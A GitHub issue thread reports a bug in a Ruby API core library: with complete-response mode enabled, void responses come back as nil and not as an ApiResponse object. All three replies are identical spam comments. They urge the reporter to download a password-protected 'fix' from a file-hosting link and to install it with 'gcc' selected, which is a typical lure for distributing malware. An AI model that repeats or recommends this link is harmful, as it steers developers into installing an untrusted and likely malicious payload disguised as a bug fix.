### ISSUE TITLE
Return Complete HTTP Response not being returned when the response is void in Response Handler

### ISSUE THREAD

**Issue by sufyankhanrao** [apimatic/core-lib-ruby#44]
**Describe the bug**
The issue is when the return complete HTTP response is enabled and the response is void then the endpoint expects the API Response object but the endpoint gets nil.

**Expected behavior**
The Response Handler should return ApiResponse object when the response is void.

**To Reproduce**
Steps to reproduce the bug:
1. Pass in the `is_api_response` flag as enabled in the response handler object.
2. Pass in the `is_response_void` flag as enabled in the response handler object.
3. You will see the returned response will be nil whereas it should be an ApiResponse object.

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
